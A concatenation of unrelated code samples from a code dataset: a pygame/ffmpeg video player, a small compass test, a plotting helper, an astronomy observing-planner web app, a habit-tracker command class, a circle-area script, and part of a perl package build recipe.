self.buffer[self._write_idx:self._write_idx + arr_len] = arr
else:
rem = self._remaining_write_capacity()
self.buffer[self._write_idx:] = arr[:rem]
rem_a = len(arr) - rem
self.buffer[:rem_a] = arr[rem:]
self._advance_w(arr_len)
def _remaining_write_capacity(self):
return self._buffer_len - self._write_idx
def _remaining_read_capacity(self):
return self._buffer_len - self._read_idx
def _advance_w(self, x):
self.fill_level += x
self._write_idx = (self._write_idx + x) % self._buffer_len
def advance_r(self, x):
self.fill_level -= x
self._read_idx = (self._read_idx + x) % self._buffer_len
def test_buffer():
b = NumpyBuffer(16, np.float32)
for i in 100:
arr = np.array([1,2,8])
b.write(arr)
assert b.peek(3) == arr
assert b.read(3) == arr
class EventManager:
def __init__(self, speed):
signal.signal(signal.SIGINT, self.set_exit)
signal.signal(signal.SIGTERM, self.set_exit)
self.exit = None
self.time_last_mouse_move = 0
self.last_mouse_pos = None
self.last_vid_resize = None
self.speed = speed
def set_exit(self, signum, frame):
self.exit = True
log.debug('Exit flag set')
def handle_events(self, screen_size, stats_survace_x_size):
events = pygame.event.get()
play_offset = None
pause = None
speed_changed = False
window_size = None
mouse_button_on_stats_surf = None
screen_adjusted = False
normal_speed = False
set_bookmark = None
goto_bookmark = None
b = None
mouse_pos = pygame.mouse.get_pos()
if mouse_pos != self.last_mouse_pos:
self.last_mouse_pos = mouse_pos
self.time_last_mouse_move = time.time()
self.mouse_moved = True
else:
self.mouse_moved = False
ctrl_down = pygame.key.get_mods() & pygame.KMOD_CTRL
shift_down = pygame.key.get_mods() & pygame.KMOD_SHIFT
jump_coef = 2 if ctrl_down else 1
jump_coef *= 0.5 if shift_down else 1
for event in events:
if event.type == pyloc.QUIT:
self.set_exit(None, None)
elif event.type == pygame.KEYDOWN:
if event.key == pygame.K_ESCAPE:
self.set_exit(None, None)
elif event.key == pygame.K_SPACE:
pause = True
elif event.key == pygame.K_LEFT:
play_offset = -10 * self.speed * jump_coef
elif event.key == pygame.K_RIGHT:
play_offset = 10 * self.speed * jump_coef
elif event.key in [pygame.K_KP_PLUS, pygame.K_PLUS]:
self.speed = self.speed * 1.1
speed_changed = True
elif event.key in [pygame.K_KP_MINUS, pygame.K_MINUS]:
self.speed = self.speed * 0.9
speed_changed = True
elif event.key == pygame.K_r:
normal_speed = True
if event.key == pygame.K_0: b = 0
if event.key == pygame.K_1: b = 1
if event.key == pygame.K_2: b = 2
if event.key == pygame.K_3: b = 3
if event.key == pygame.K_4: b = 4
if event.key == pygame.K_5: b = 5
if event.key == pygame.K_6: b = 6
if event.key == pygame.K_7: b = 7
if event.key == pygame.K_8: b = 8
if event.key == pygame.K_9: b = 9
if b:
if pygame.key.get_mods() & pygame.KMOD_CTRL:
set_bookmark = 1
else:
goto_bookmark = 1
elif event.type == pygame.MOUSEBUTTONDOWN:
if mouse_pos[1] > screen_size[1] - stats_survace_x_size:
mouse_button_on_stats_surf = True
else:
pause = True
if event.type == pyloc.VIDEORESIZE:
self.last_vid_resize = event.dict['size']
screen_adjusted = True
log.debug(f'resize: {self.last_vid_resize}')
if not screen_adjusted and self.last_vid_resize:
window_size = self.last_vid_resize
self.last_vid_resize = None
pygame.display.flip()
speed = self.speed if speed_changed else None
mouse_pos = mouse_pos if mouse_button_on_stats_surf else None
return PlayArgs(mouse_pos, play_offset, window_size,
speed, normal_speed, pause, set_bookmark,
goto_bookmark, self.exit)
class AudioPlayer:
def __init__(self, pyaudio_instance, audio_sr, speed, silence_speedup,
file, play_from, ffmpeg_loglevel, volume, audio_channel):
self.volume = volume
self.pyaudio_instance = pyaudio_instance
self.audio_sr = audio_sr
self.speed = speed
self.silence_speedup = silence_speedup
self.file = file
self.play_from = play_from
self.ffmpeg_loglevel = ffmpeg_loglevel
self.BLOCK_LENGTH = 1024 * 24
self.AUDIO_DROP_SKIP_DURATION = \
self.BLOCK_LENGTH / audio_sr / speed * silence_speedup / 2
self.AUDIO_THRESHHOLD = 0.1
self.HORIZON_COEF = 4
self.FRAME_LENGTH = \
int(self.BLOCK_LENGTH * self.HORIZON_COEF * self.speed)
self.ADVANCE_LENGTH = int(self.BLOCK_LENGTH * self.speed)
self.n_droped = 0
self.audio_stream = create_ffmpeg_audio_stream(
file, play_from, ffmpeg_loglevel, audio_channel)
self.buff = NumpyBuffer(self.FRAME_LENGTH * 20, np.float32)
i = np.frombuffer(
self.audio_stream.stdout.read(self.FRAME_LENGTH * 4),
np.float32)
self.buff.write(i)
self.audio_out_stream = pyaudio_instance.open(
format=pyaudio.paFloat32,
channels=1,
rate=audio_sr * 2,
frames_per_buffer=self.BLOCK_LENGTH,
output=True,
stream_callback=self._callback_ff
)
self.first_callback = True
self.trigger_last_write = False
self.last_write_triggered = False
playlog.debug('Audioplayer started')
def _callback_ff(self, in_data, frame_count, time_info, status):
while self.buff.fill_level < self.FRAME_LENGTH * 2:
s = self.audio_stream.stdout.read(self.ADVANCE_LENGTH * 4)
if len(s) == 0:
playlog.debug("Audiostream end reached")
return None, pyaudio.paComplete
i = np.frombuffer(s, np.float32)
self.buff.write(i)
frame_1 = self.buff.peek(self.FRAME_LENGTH)
self.buff.advance_r(self.ADVANCE_LENGTH)
frame_2 = self.buff.peek(self.FRAME_LENGTH)
data1 = lr.effects.time_stretch(
frame_1, self.speed, center=False)
data2 = lr.effects.time_stretch(
frame_2, self.speed, center=False)
a1 = data2[:self.BLOCK_LENGTH]
a2 = np.linspace(0, 1, self.BLOCK_LENGTH)
a = a1 * a2
b1 = data1[self.BLOCK_LENGTH:self.BLOCK_LENGTH*2]
b2 = np.linspace(1, 0, self.BLOCK_LENGTH)
b = b1 * b2
data = (a + b).astype('float32')
# Drop silence
if self.silence_speedup > 1 and \
(self.buff.peek(int(self.BLOCK_LENGTH * (self.silence_speedup - 1) * self.speed)) <
self.AUDIO_THRESHHOLD).all():
self.buff.advance_r(int(self.BLOCK_LENGTH * (self.silence_speedup - 1)))
self.n_droped += 1
if self.first_callback:
self.first_callback = False
data = (data * self.volume * np.linspace(0, 1, self.BLOCK_LENGTH)).astype('float32')
return data, pyaudio.paContinue
elif self.trigger_last_write:
data = (data * self.volume * np.linspace(1, 0, self.BLOCK_LENGTH)).astype( 'float32')
self.last_write_triggered = True
return data, pyaudio.paComplete
else:
return data * self.volume, pyaudio.paContinue
def close(self):
self.trigger_last_write = True
time.sleep(0.3)
self.audio_out_stream.close()
self.audio_stream.kill()
def sec_to_time_str(x):
m, s = divmod(x, 60)
h, m = divmod(m, 60)
return f'{int(h):02}:{int(m):02}:{int(s):02}'
def get_stats_surf(playbar_offset_pix, x_size, screen_resolution, playbacktime,
total_media_length, speed, silence_speedup):
FONT_SIZE = 20
FONT_COLOR = (200, 200, 200)
font = pygame.font.SysFont(None, FONT_SIZE)
x, y = screen_resolution[0], x_size
pos = screen_resolution[0] - x, screen_resolution[1] - y
surf = pygame.Surface((x, y))
surf.set_alpha(200)
ratio_played = playbacktime / total_media_length
outline = pygame.Rect(playbar_offset_pix[0], playbar_offset_pix[1],
x - playbar_offset_pix[0] * 2,
y - playbar_offset_pix[1] * 2)
progress = outline.copy()
progress.width = outline.width * ratio_played
OUTLINE_THICKNESS = 2
outline.height -= OUTLINE_THICKNESS / 2
outline.width -= OUTLINE_THICKNESS / 2
a = 50
pygame.draw.rect(surf, (a, a, a), outline, OUTLINE_THICKNESS)
pygame.draw.rect(surf, (255, 255, 255), progress)
# TIMINGS
PADING = 3
text = font.render(f' {sec_to_time_str(playbacktime)}', True, FONT_COLOR)
surf.blit(text, (PADING, PADING))
time_remaining = sec_to_time_str(
(total_media_length - playbacktime) / speed)
text = font.render(f'-{time_remaining}', True, FONT_COLOR)
surf.blit(text, (PADING, y / 2 - PADING - FONT_SIZE / 5))
text = font.render(f' {sec_to_time_str(total_media_length)}', True,
FONT_COLOR)
surf.blit(text, (PADING, y - PADING - FONT_SIZE / 1.5))
# Settings
text = font.render(f'sp: {speed:01.2f}', True, FONT_COLOR)
surf.blit(text, (x - FONT_SIZE + PADING - 42, PADING))
# text = font.render(f' {speed}', True, FONT_COLOR)
# surf.blit(text, (x - FONT_SIZE + PADING, PADING))
text = font.render(f's-sp: {silence_speedup:01}', True, FONT_COLOR)
surf.blit(text, (x - FONT_SIZE + PADING - 42, y - PADING - FONT_SIZE / 1.5))
return surf, pos
def create_ffmpeg_video_stream(file, ss, ffmpeg_loglevel, frame_rate):
read_proc = (
ffmpeg
.input(file, ss=ss, loglevel=ffmpeg_loglevel)
.output('pipe:', format='rawvideo', pix_fmt='rgb24', r=frame_rate)
.run_async(pipe_stdout=True)
)
return read_proc
def create_ffmpeg_audio_stream(file, ss, ffmpeg_loglevel, audio_channel=0):
read_proc = (
ffmpeg
.input(file, ss=ss, loglevel=ffmpeg_loglevel)
.output('pipe:', format='f32le', acodec='pcm_f32le',
map=f'0:a:{audio_channel}')
.run_async(pipe_stdout=True)
)
return read_proc
def play_from_pos(file, screen, screen_resolution, video_resolution,
pyaudio_instance, audio_sr, volume, audio_channel,
frame_rate, speed, play_from, silence_speedup,
ffmpeg_loglevel, event_manager, input_length,
playbar_offset_pix, stats_surface_x_size):
v_width, v_height = video_resolution
playlog.debug("Starting video stream.")
video_stream = create_ffmpeg_video_stream(file, play_from, ffmpeg_loglevel,
frame_rate)
audio_player = AudioPlayer(pyaudio_instance, audio_sr, speed,
silence_speedup, file, play_from,
ffmpeg_loglevel, volume, audio_channel)
def cleanup():
audio_player.close()
video_stream.kill()
def get_video_position(curr_idx, frame_rate, play_from):
return curr_idx / frame_rate + play_from
playlog.debug("starting playback")
start_time = time.time()
curr_idx = 0
playback_offset = 0
while True:
ret = event_manager.handle_events(screen_resolution,
stats_surface_x_size)
video_position = get_video_position(curr_idx, frame_rate, play_from)
if video_position > input_length:
input_length = get_file_length(file)
if ret.got_command():
draw_stats_surf(input_length, playbar_offset_pix, screen,
screen_resolution, silence_speedup, speed,
stats_surface_x_size, video_position)
cleanup()
return False, video_position, ret
playback_time = time.time() - start_time + playback_offset
playback_offset += audio_player.AUDIO_DROP_SKIP_DURATION * \
(audio_player.n_droped * VIDEO_SKIP_COEF)
audio_player.n_droped = 0
frame_idx = int(playback_time * frame_rate * speed)
if curr_idx >= frame_idx:
continue
while curr_idx < frame_idx:
video_stream.stdout.read(v_width * v_height * 3)
curr_idx += 1
in_bytes = video_stream.stdout.read(v_width * v_height * 3)
curr_idx += 1
if len(in_bytes) == 0:
playlog.info("Video steam empty, stopping playback")
draw_stats_surf(input_length, playbar_offset_pix, screen,
screen_resolution, silence_speedup, speed,
stats_surface_x_size, video_position)
cleanup()
return True, video_position, ret
in_frame = (
np
.frombuffer(in_bytes, np.uint8)
.reshape([v_height, v_width, 3])
.transpose([1, 0, 2])
)
frame_surf = pygame.surfarray.make_surface(in_frame)
# if not video_resolution == screen_resolution:
frame_surf = pygame.transform.scale(frame_surf, screen_resolution)
screen.blit(frame_surf, (0, 0))
if time.time() - event_manager.time_last_mouse_move < 2:
draw_stats_surf(input_length, playbar_offset_pix, screen,
screen_resolution, silence_speedup, speed,
stats_surface_x_size, video_position)
pygame.display.flip()
raise Exception("Invalid programm state")
def draw_stats_surf(input_length, playbar_offset_pix, screen,
screen_resolution, silence_speedup, speed,
stats_surface_x_size, video_position):
stats_surf, pos = get_stats_surf(playbar_offset_pix, stats_surface_x_size,
screen_resolution, video_position,
input_length, speed, silence_speedup)
screen.blit(stats_surf, pos)
# =============================================================================
# STARTUP
# =============================================================================
def get_file_resolution(file):
r = subprocess.run(["ffprobe", "-v", "error", "-select_streams", "v:0",
f"-show_entries", "stream=width,height",
f"-of", "csv=s=x:p=0", file],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
res = re.match(r'(\d+)x(\d+)\n?', r.stdout.decode('utf-8'))
if not res:
raise Exception(f"Could not infer resolution from ffprobe output {r}.")
return int(res.group(1)), int(res.group(2))
def get_file_length(file):
r = subprocess.run(["ffprobe", "-v", "error", "-show_entries",
"format=duration", "-of",
"default=noprint_wrappers=1:nokey=1", file],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
try:
return float(r.stdout)
except Exception as e:
log.error("Could not extract file length.")
raise
SPEED_DEFAULT = 1.8
SILENCE_SPEEDUP_DEFAULT = 5
@click.command()
@click.argument('file',
type=click.Path(True, dir_okay=False, resolve_path=True))
@click.option('-s', '--speed', type=float, default=SPEED_DEFAULT, show_default=True,
help='How fast to playback.')
@click.option('-b', '--silence-speedup', default=SILENCE_SPEEDUP_DEFAULT, type=int,
show_default=True,
help="How much faster to play silence. This is in addition to "
"the speedup specified with --speed.")
@click.option('-v', '--volume', type=float, default=1, show_default=True,
help='Playback volume of audio.')
@click.option('--audio-channel', type=int, default=0, show_default=True,
help='The audio channel to play back.')
@click.option('--play-from', type=int, default=None, show_default=True,
help='Where to start playback in seconds. Overwrites loaded '
'playback location.')
@click.option('--frame-rate', type=int, default=15, show_default=True,
help='The framerate to play the video back at. Low values '
'improve performance.')
@click.option('-r', '--init-screen-res', type=int, nargs=2,
default=(1885, 1012),
show_default=True,
help='What resolution should the input be stretched to '
'initially.')
@click.option('-r', '--max-screen-res', type=int, nargs=2,
default=(1920, 1080),
show_default=True,
help='The maximum resolution that the screen can take.')
@click.option('--no-save-pos', is_flag=True,
help='Disable loading and saving of the playback position.')
@click.option('--ffmpeg-loglevel', default='warning', show_default=True,
help="Set the loglevel of ffmpeg.")
def main(file, speed, play_from, frame_rate, volume, audio_channel,
init_screen_res, max_screen_res,
silence_speedup, no_save_pos, ffmpeg_loglevel):
"""
Runtime commands
Space Pause playback
left_arrow Seek backwards 5 seconds
right_arrow Seek forward 5 seconds
mouse_click Jump to position in timeline at mouse position
plus Increase playback speed 10%
minus Decrease playback speed 10%
r toogle between set speed and speed 1
Esc Exit the application
"""
if silence_speedup < 1:
raise Exception(f"--silence-speedup needs to be an integer greater "
f"than zero.")
if speed < 1:
raise Exception(f"speeds under 1 are not supported right now as they "
f"lead to a sound buffer underflow for some reason.")
VIDEO_PLAYBACK_SAVE_FILE = \
f'{os.path.dirname(__file__)}/playback_positions.json'
STATS_SURFACE_X_SIZE = 1080//20
SEEKBACK_ON_RESUME = 1
log.debug(f'Video pos save file {VIDEO_PLAYBACK_SAVE_FILE}')
pyaudio_instance = pyaudio.PyAudio()
pygame.init()
screen = pygame.display.set_mode(max_screen_res,
pygame.HWSURFACE | pygame.DOUBLEBUF | pygame.RESIZABLE)
pygame.display.set_caption(f'bepl {file}')
audio_sr = lr.get_samplerate(file)
log.debug(f'Audio sample-rate of {audio_sr} inferred.')
input_resolution = get_file_resolution(file)
log.debug(f'Video resolution infered {input_resolution}')
input_length = get_file_length(file)
n_input_length = None
if not play_from:
play_from = 0
if not play_from and not no_save_pos:
play_from = load_playback_pos(VIDEO_PLAYBACK_SAVE_FILE, file)
PLAYBAR_OFFSET_PIX = (70, 10)
event_manager = EventManager(speed)
cmd = {'file': file,
'screen': screen,
'screen_resolution': init_screen_res,
'video_resolution': input_resolution,
'audio_sr': audio_sr,
'frame_rate': frame_rate,
'speed': speed,
'play_from': play_from,
'silence_speedup': silence_speedup,
'pyaudio_instance': pyaudio_instance,
'ffmpeg_loglevel': ffmpeg_loglevel,
'event_manager': event_manager,
'input_length': input_length,
'playbar_offset_pix': PLAYBAR_OFFSET_PIX,
'volume': volume,
'audio_channel': audio_channel,
'stats_surface_x_size': STATS_SURFACE_X_SIZE,
}
while True:
while True:
stream_ended, vid_pos, new_cmd = play_from_pos(**cmd)
n_input_length = get_file_length(file)
if not stream_ended or input_length == n_input_length:
input_length = n_input_length
cmd['input_length'] = input_length
break
else:
input_length = n_input_length
cmd['input_length'] = input_length
if new_cmd.exit:
if not no_save_pos:
save_playback_pos(VIDEO_PLAYBACK_SAVE_FILE, file, vid_pos)
break
cmd['play_from'] = vid_pos
if new_cmd.window_size:
init_screen_res = new_cmd.window_size
cmd['screen_resolution'] = init_screen_res
if new_cmd.pause or stream_ended:
log.debug("Paused or stream end reached, waiting for command.")
cmd['play_from'] -= SEEKBACK_ON_RESUME
while True:
time.sleep(0.1)
new_cmd = event_manager.handle_events(cmd['screen_resolution'],
STATS_SURFACE_X_SIZE)
if new_cmd.got_command():
break
if new_cmd.speed:
if new_cmd.speed < 1:
log.warning(
f"Speeds under 1 are not supported right now as they "
f"lead to a sound buffer underflow for some reason.")
cmd['speed'] = 1
speed = 1
else:
speed = new_cmd.speed
cmd['speed'] = new_cmd.speed
if new_cmd.normal_speed:
if cmd['speed'] == 1:
cmd['speed'] = speed
else:
cmd['speed'] = 1
if new_cmd.position_offset:
cmd['play_from'] = \
np.clip(vid_pos + new_cmd.position_offset,
0,
input_length - 0.5)
if new_cmd.mouse_pos:
zeroed = new_cmd.mouse_pos[0] - PLAYBAR_OFFSET_PIX[0]
scaled = zeroed / (
init_screen_res[0] - PLAYBAR_OFFSET_PIX[0] * 2)
cmd['play_from'] = np.clip(scaled * input_length,
0,
input_length - 0.5)
pyaudio_instance.terminate()
pygame.display.quit()
#TODO implement bookmarking
def save_playback_position():
pass
def load_playback_position():
pass
def load_playback_pos(save_file, video_file, seek_back=2):
if not os.path.isfile(save_file):
return 0
with open(save_file) as f:
data = json.load(f)
if video_file in data.keys():
play_from = data[video_file]
else:
play_from = 0
log.debug(f'Loaded playback time of {video_file}')
return max(0, play_from - seek_back)
def save_playback_pos(save_file, video_file, vid_pos):
new_save = {video_file: vid_pos}
data = {}
if os.path.isfile(save_file):
with open(save_file, 'r') as f:
data = json.load(f)
data.update(new_save)
with open(save_file, 'w') as f:
json.dump(data, f)
log.debug(f'Saved playback time of {video_file}')
if __name__ == '__main__':
VIDEO_SKIP_COEF = 0.75
main()
| StarcoderdataPython |
3320786 | import sys
import fake_rpi
sys.modules['smbus2'] = fake_rpi.smbus
from gamutrf import compass
def test_compass_bearing():
bearing = compass.Bearing()
bearing.get_bearing()
| StarcoderdataPython |
1754411 | import matplotlib.pyplot as plt
import time as timelib
def boxplot(session_data, cluster_type, features, filename = None,verbose = False):
"""
Plot boxplots of the sessions features given in entry
Parameters
----------
session_data: pandas dataframe of requests
cluster_type: string
features: list of string, which feature wanted to be plotted
Returns
-------
None
"""
if verbose== True:
start_time = timelib.time()
print("\n * Plotting boxplots ...")
n_plots = len(features)
fig,ax=plt.subplots(1,n_plots,figsize=(16,4))
axis_counter=0
cluster_ids = session_data[cluster_type].unique()
cluster_ids.sort()
for feature in features:
feature_boxplot_data = []
for c_id in cluster_ids:
feature_boxplot_data.append(session_data[session_data[cluster_type]==c_id][feature].values)
ax[axis_counter].boxplot(feature_boxplot_data,showfliers=False)
ax[axis_counter].set_xticklabels(cluster_ids)
for tick in ax[axis_counter].xaxis.get_major_ticks():
tick.label.set_fontsize(10)
for tick in ax[axis_counter].yaxis.get_major_ticks():
tick.label.set_fontsize(10)
ax[axis_counter].set_title(features[axis_counter])
axis_counter+=1
ax[2].set_xlabel('\nCluster',fontsize=18)
plt.tight_layout()
if filename is not None:
plt.savefig('./%s.pdf'%filename)
plt.show()
plt.clf()
plt.close()
if verbose == True:
print(" Boxplots plotted in %.1f seconds."%(timelib.time() - start_time))
return; | StarcoderdataPython |
135822 | <reponame>WWGolay/gemini-tools<filename>obsplanner.py
#!/usr/bin/env python
# coding: utf-8
'''
obsplanner: IRO Observing planner. Uses web interface.
N.B. libraries astroplan, pywebio, jplephem must be installed.
*** NB requires astroquery version 4.3+ [this is required for JPL Horizons planet lookup to work correctly]
v. 0.9 3 Feb 2022 RLM
'''
import numpy as np
from astropy.time import Time
from obsplanner_lib import obs_planner
from obsplanner_utilities import get_inputs, get_recommendation
import matplotlib
import matplotlib.pyplot as plt
#from pywebio.input import *
from pywebio.output import put_text, put_image, put_buttons, put_table, put_link
from pywebio import config,start_server
from pywebio.input import TEXT, FLOAT
import pywebio.input as pywebio_input
import pywebio.session as session
import astropy.units as u
from astropy.coordinates import Angle, SkyCoord, EarthLocation, get_moon, solar_system_ephemeris, get_body
import warnings
matplotlib.use('agg') # required, use a non-interactive backend
warnings.filterwarnings("ignore") # Suppress warning from axis projections
# Choose a pretty theme (current choices: dark, yeti,sketchy, minty)
theme = 'dark'
if theme == 'dark':
title_style ='color: yellow'
else:
title_style ='color: black'
warning_style = 'color:red'
# Set title that appears in web tab
@config(title='Iowa Robotic Observatory Observing Planner',theme=theme)
def main():
# Define constants
arcsec = np.pi/(180*3600)
# Add a banner
iro_banner = '/home/www/cgi-bin/astrolab/iro-banner.png'
#iro_banner= 'iro-banner.png'
put_image( open(iro_banner, 'rb').read() )
# TBD Add link to JPL Horizons web tool
# put_link('Inputs (Click for compatible solar system object names',url='https://ssd.jpl.nasa.gov/horizons/app.html#/')
# Get inputs from webpage
object_name, telescope, obsdate, myfilter, seeing, detailed = get_inputs()
detailed = detailed != []
myfilter = myfilter.upper()
fwhm = seeing * arcsec # Convert to radians
time = Time(obsdate, scale='utc')
# Set camera and gain mode
if 'Gemini' in telescope:
camera = 'AC4040'
mode = 'Spro' # Fixed mode (for now) to Spro only
else:
camera = 'SBIG6303'
mode = 'Default'
# Instantiate obs_planner class
B = obs_planner(telescope, camera, object_name, myfilter, fwhm, time)
# Get some observer, object info
observer, obsname, obscode, description, min_elevation = B.observatory_info()
coords, coords_string, magnitude, objtype, is_extended, diameter, sp_type, \
moon_illum, moon_angle, solar_system_object = B.object_info()
# Warn if object is below minimum observable elevation for entire night: User needs to refresh page and start over
def reset_form(dummy):
session.run_js('window.close()')
object_up_times, object_up_hrs = B.object_up()
if object_up_hrs == 0:
s1 = '%s is below minimum observable elevation, cannot observe from %s. ' %\
(object_name,telescope)
s2 = 'Refresh webpage to start over'
s = s1+s2
put_buttons([dict(label=s, value='dummy',color='danger')], onclick=reset_form)
session.hold()
# Get magnitude from user if magnitude lookup wasn't successful
if np.isnan(magnitude) or magnitude is None:
put_text(' ')
magnitude = pywebio_input.input('Could not find a magnitude for %s, please enter:' % object_name,type=FLOAT)
B.set_magnitude(magnitude)
# Report coordinates, object identification, number of hours object is above minimum elevation
put_text(' ')
put_text('Summary Information').style(title_style)
put_text('%s Coordinates(J2000): %s' % (object_name, coords_string))
if is_extended:
put_text('Object type: %s, Magnitude = %.1f, diameter %.1f arcmin' % (objtype,magnitude,diameter))
else:
put_text('Object type: %s, Magnitude = %.1f ' % (objtype, magnitude))
put_text('%s is above minimum elevation (%i deg) for %.1f hours' % (object_name, min_elevation, object_up_hrs))
# Report moon stats, proximity to object; warn user if close
if detailed:
put_text('Moon illumination: %i%%' % ( moon_illum*100))
put_text('Moon separation from object %s: %i\N{DEGREE SIGN}' % (object_name, moon_angle))
if moon_illum > 0.50 and moon_angle < 45 and object_name.casefold() != 'Moon'.casefold():
put_text('WARNING: Moon is bright and close to your object (%i degrees). \
This will likely adversely affect image quality' % moon_angle).style(warning_style)
# Rise/set table sunrise, sunset defined by solar elev = -12 deg; object rise/set define by observatory's min. elev.
put_text('Rise and Set Times for Sun, Moon, %s at %s' % (object_name, obsname) ).style(title_style)
A = B.rise_set_table()
put_table(A[1:], header = A[0])
# Coordinates table if solar system object
if detailed and solar_system_object:
put_text('Coordinates vs. UT (querying JPL Horizons...)').style(title_style)
A = B.coordinates_table(ntimes_per_hr =2)
put_table(A[1:], header = A[0])
# Display clear sky plot from ClearDarkSky website if observing is for tonight and observer requests detailed view
if detailed:
put_text(' ')
put_text('Clear Sky predicted observing conditions for next several nights').style(title_style)
if 'Gemini' in telescope:
clearsky_image = 'https://www.cleardarksky.com/c/WnrObAZcsk.gif?c=1159225'
clearsky_webpage ='http://www.cleardarksky.com/c/WnrObAZkey.html'
put_image(clearsky_image)
else:
clearsky_image = 'https://www.cleardarksky.com/c/IwCtyIAcsk.gif?c=1764035'
clearsky_webpage ='http://www.cleardarksky.com/c/IwCtyIAkey.html'
put_image(clearsky_image)
put_link('Click to visit ClearSky webpage for more details',url=clearsky_webpage,new_window=True)
# Plot airmass vs time
put_text(' ')
put_text('Airmass vs. UT. Note: %s is only observable within times with darkest shading.' % object_name).style(title_style)
buf = B.airmass_plot()
s = '%s Airmass plot' % object_name
put_image(buf.getvalue(),title=s)
# Optionally plot track of object on sky chart and a finding chart
if detailed:
# Sky track
put_text(' ')
put_text('%s Track on Sky. Note: Points are spaced hourly.' % object_name).style(title_style)
buf = B.sky_plot()
put_image(buf.getvalue())
# 10'x10' DSS image
put_text(' ')
put_text('10x10 arcmin finding chart for %s [Note: Solar System objects will not appear]' \
% object_name).style(title_style)
buf = B.image_field_plot()
if buf != None:
put_image(buf.getvalue())
# Report some recommendations for exposure time and filters
put_text(' ')
put_text('Recommendations and Observing Notes').style(title_style)
recommend_string = get_recommendation(object_name, objtype, is_extended, B, mode, seeing, myfilter,magnitude)
put_text(recommend_string)
# Optionally plot SNR vs. exposure time and table of sky conditions, SNR [point sources only]
if not is_extended and detailed:
# Plot SNR vs exposure time
put_text(' ')
put_text('Signal to Noise Ratio vs. Exposure time Plot').style(title_style)
buf = B.snr_plot(mode)
put_image(buf.getvalue())
# Table of sky conditions, ADU, and saturation times
put_text('Use this table and graph to determine suitable exposure times')
put_text(' ')
A,saturation_time = B.photometry_summary_table(mode)
put_text('Saturation exposure time = %.1f sec' % saturation_time)
put_table(A[1:], header = A[0])
if __name__ == "__main__":
main()
#start_server(main, port=8080, debug=True)
| StarcoderdataPython |
3271554 | <gh_stars>0
from habits.database.habit_repository import HabitRepository
from habits.database.database import Database
from habits.database.tracking_repository import TrackingRepository
import sys
class Command:
_args: list
_config: 'config'
_database: Database
_habit_repository: HabitRepository = None
_tracking_repository: TrackingRepository = None
def __init__(self, args: list, database: Database, config: 'config'):
self._args = args
self._config = config
self._database = database
@property
def args(self) -> list:
return self._args
@property
def config(self) -> 'config':
return self._config
@property
def database(self) -> Database:
return self._database
@property
def habit_repository(self) -> HabitRepository:
if self._habit_repository is None:
self._habit_repository = HabitRepository(self.database, self.config)
return self._habit_repository
@property
def tracking_repository(self) -> TrackingRepository:
if self._tracking_repository is None:
self._tracking_repository = TrackingRepository(self.database, self.config)
return self._tracking_repository
# Display a generic list of habits
def display_habit_list(self, period: str = None):
output = '{}{}{}{}{}\n'
for habit in self.habit_repository.fetch_all():
if period is not None and habit.period != period:
continue
sys.stdout.write(
output.format(
habit.id,
" " * (4 - len(str(habit.id))),
habit.period,
" " * (10 - len(str(habit.period))),
habit.title
)
)
| StarcoderdataPython |
1680499 | r=input("input the radius of the circle:")
area=3.14*float(r)*float(r)
print("The area of the circle is:",area)
| StarcoderdataPython |
1617687 | <gh_stars>0
pkgname = "perl"
pkgver = "5.32.1"
pkgrel = 0
_perl_cross_ver = "1.3.5"
build_style = "gnu_configure"
make_cmd = "gmake"
hostmakedepends = ["gmake", "less"]
makedepends = ["zlib-devel", "bzip2-devel"]
depends = ["less"]
checkdepends = ["iana-etc", "perl-AnyEvent", "perl-Test-Pod", "procps-ng"]
pkgdesc = "Practical Extraction and Report Language"
maintainer = "q66 <<EMAIL>>"
license = "Artistic=1.0-Perl, GPL=1.0-or-later"
url = "https://www.perl.org"
sources = [
f"https://www.cpan.org/src/5.0/perl-{pkgver}.tar.gz",
f"https://github.com/arsv/perl-cross/releases/download/{_perl_cross_ver}/perl-cross-{_perl_cross_ver}.tar.gz"
]
sha256 = [
"03b693901cd8ae807231b1787798cf1f2e0b8a56218d07b7da44f784a7caeb2c",
"91c66f6b2b99fccfd4fee14660b677380b0c98f9456359e91449798c2ad2ef25"
]
# prevent a massive log dump
tool_flags = {
"CFLAGS": [
"-Wno-compound-token-split-by-macro",
"-DNO_POSIX_2008_LOCALE",
"-D_GNU_SOURCE",
],
"LDFLAGS": ["-Wl,-z,stack-size=2097152", "-pthread"],
}
options = ["!check"]
# Before updating this package to a new major version, run ${FILESDIR}/provides.pl
# against ${wrksrc} to find the list of built in packages.
provides = [
"perl-Archive-Tar=2.36-r1",
"perl-Attribute-Handlers=1.01-r1",
"perl-AutoLoader=5.74-r1",
"perl-CPAN=2.27-r1",
"perl-CPAN-Meta=2.150010-r1",
"perl-CPAN-Meta-Requirements=2.140-r1",
"perl-CPAN-Meta-YAML=0.018-r1",
"perl-Carp=1.50-r1",
"perl-Compress-Raw-Bzip2=2.093-r1",
"perl-Compress-Raw-Zlib=2.093-r1",
"perl-Config-Perl-V=0.32-r1",
"perl-Data-Dumper=2.174.01-r1",
"perl-Devel-PPPort=3.57-r1",
"perl-Devel-SelfStubber=1.06-r1",
"perl-Digest=1.17.01-r1",
"perl-Digest-MD5=2.55.01-r1",
"perl-Digest-SHA=6.02-r1",
"perl-Dumpvalue=1.21-r1",
"perl-Encode=3.06-r1",
"perl-Env=1.04-r1",
"perl-Exporter=5.74-r1",
"perl-ExtUtils-CBuilder=0.280234-r1",
"perl-ExtUtils-Constant=0.25-r1",
"perl-ExtUtils-Install=2.14-r1",
"perl-ExtUtils-MakeMaker=7.44-r1",
"perl-ExtUtils-Manifest=1.72-r1",
"perl-ExtUtils-ParseXS=3.40-r1",
"perl-File-Fetch=0.56-r1",
"perl-File-Path=2.16-r1",
"perl-File-Temp=0.2309-r1",
"perl-Filter-Simple=0.96-r1",
"perl-Filter-Util-Call=1.59-r1",
"perl-FindBin=1.51-r1",
"perl-Getopt-Long=2.51-r1",
"perl-HTTP-Tiny=0.076-r1",
"perl-I18N-Collate=1.02-r1",
"perl-I18N-LangTags=0.44-r1",
"perl-IO=1.43-r1",
"perl-IO-Compress=2.093-r1",
"perl-IO-Socket-IP=0.39-r1",
"perl-IO-Zlib=1.10-r1",
"perl-IPC-Cmd=1.04-r1",
"perl-IPC-SysV=2.07-r1",
"perl-JSON-PP=4.04-r1",
"perl-Locale-Maketext=1.29-r1",
"perl-Locale-Maketext-Simple=0.21.01-r1",
"perl-MIME-Base64=3.15-r1",
